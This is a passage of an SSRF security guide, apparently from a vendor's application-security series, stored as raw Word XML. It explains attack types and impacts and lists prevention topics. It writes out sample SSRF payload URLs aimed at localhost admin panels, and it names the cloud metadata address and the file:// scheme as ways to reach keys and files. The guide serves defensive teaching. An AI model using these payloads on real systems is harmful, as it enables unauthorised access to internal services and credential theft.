      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>ssrf mitigation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2441A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Once the manipulated request is sent to the server, the server-side code tries to read data to the manipulated URL. As a result, the attacker may read data from services not intentionally exposed to the internet, for example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB5D8E" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The meta-data of a cloud server: the attacker could access important configuration or sometimes even authentication keys from a REST interface on http://169.254.169.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1300EEB3" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database HTTP interfaces: NoSQL databases provide REST interfaces on HTTP ports. If there is no authentication enabled, which is often the case with databases meant for internal use, the attacker may extract sensitive data from that database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D201E6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attacker may access internal REST interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049FA93A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attacker may be able to read files by using URIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2BD349" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attacker can also use this to import data into code that was meant to only read data from trusted sources, and because of that has no input validation in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385580B8" w14:textId="617F2C84" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ECDD41A" wp14:editId="2681ED73">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20893830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37ED95" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Most of the techniques used to launch an SSRF attack use a URL that contains data that the target server doesn’t expect and doesn’t deal with in a safe manner. In the majority of cases, these involve specific characters that lead the webserver astray.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A245B1" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The URL string doesn’t have to begin with “http” or “https”. It can begin with “file”, “dict”, and “image”. Those imply a specific type of resource the server expects to return, or in the case of “ftp” and “gopher”, specify services that will be used to return data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13588BF8" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If the application isn’t coded to properly whitelist only those resources and service types intended for its use, the others can be the gateway to behavior the developers didn’t intend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE5574" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Another example includes special characters that can be embedded within URLs. These characters can be the jumping-off point for the malicious URL excursions into resources you thought were safe. Those characters can be “#”, indicating a URL fragment to follow, or other special characters like “?” and “*”, but in all cases, the code that follows the special character is the malicious payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26210B00" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The application server itself can be attacked through URLs specifying that information should be returned from 127.0.0.1 or “localhost”. This can result in the server giving up sensitive information about itself – information that can then be used for even more powerful and pervasive attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAFB9E4" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attackers exploiting SSRF vulnerabilities can abuse any user inputs that accept URLs or file uploads, causing the server to connect to malformed URLs or external resources. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B5730" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacts of an SSRF server side attack include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCB3D8" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Malicious attacks that appear to originate from the organization hosting the vulnerable application, causing potential legal liabilities and reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C0C10" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unauthorized access to sensitive configurations—including server files, cloud provider metadata, and open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090763D6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal port scanning—SSRF attacks can scan internal networks, letting an attacker Identify and exploit unsecured services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8DBEAF" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit chaining—SSRF exploits can be “chained” into other attacks that are more damaging, ranging from reflected XSS to remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D92FC4" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read on to understand the three main types of SSRF attacks and what you can do to prevent them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A1ABE" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is part of an extensive series of guides about </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>application security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48B0A8C4" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In this article, you will learn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C473474" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:anchor="types-of-ssrf" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>3 Types of SSRF Attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12B42A66" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:anchor="attack-against-server" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Attack Against the Server—Injecting Payloads</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24CB3FE2" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:anchor="xspa" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>XSPA—Port Scanning on the Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="245E76C1" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:anchor="cloud-provider-metadata" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Obtaining Access to Cloud Provider Metadata</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56FE7FB0" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:anchor="preventing-ssrf" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Preventing SSRF Attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C7557E7" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:anchor="whitelist-domains-in-dns" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Whitelist Domains in DNS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CBA385F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:anchor="raw-responses" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Do Not Send Raw Responses</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F116D4D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:anchor="url-schemas" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Enforce URL Schemas</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A9B062D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:anchor="authentication-on-all-services" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Enable Authentication on All Services</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5848D911" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:anchor="sanitize-and-validate-inputs" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Sanitize and Validate Inputs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DBC5084" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:anchor="ssrf-bypass" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Why is it Ineffective to Blacklist Domains and IPs?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C69D502" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:anchor="ssrf-protection-nexdast" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>SSRF Protection with Bright</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="431D8DB6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3 Types of SSRF Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD24CBE" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>There are three main types of server-side request forgery attacks: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6F5C2" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack carried against the server itself by using a loopback network interface (127.0.0.1 or localhost), or abusing the trust relationship between the server and other services on the same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9EDA0F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSPA attack providing information about open ports on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F204F56" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack providing data about the cloud provider hosting the server (such as AWS, Azure, or GCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55906092" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Attack Against the Server—Injecting SSRF Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED5A213" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF is injected into any parameter that accepts a URL or a file. When injecting SSRF payloads in a parameter that accepts a file, the attacker has to change Content-Type to text/plain and then inject the payload instead of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B76F00" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accessing Internal Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29FA0B" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accessing internal resources can mean a couple of different things. It can be achieved by accessing the /admin panel that is only accessible from within the internal network. Reading files from the server. This can be done using the file schema (file://path/to/file).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A1D76" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accessing Internal Pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF90AD1" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some common exploits for accessing internal pages include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320AA53" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=http://127.0.0.1/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://127.0.0.1/phpmyadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://127.0.0.1/pgadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://127.0.0.1/any_interesting_page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2733070C" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Accessing Internal Files via URL Scheme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2297A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacking the URL scheme allows an attacker to fetch files from a server and attack internal services.</w:t>
      </w:r>
    </w:p>
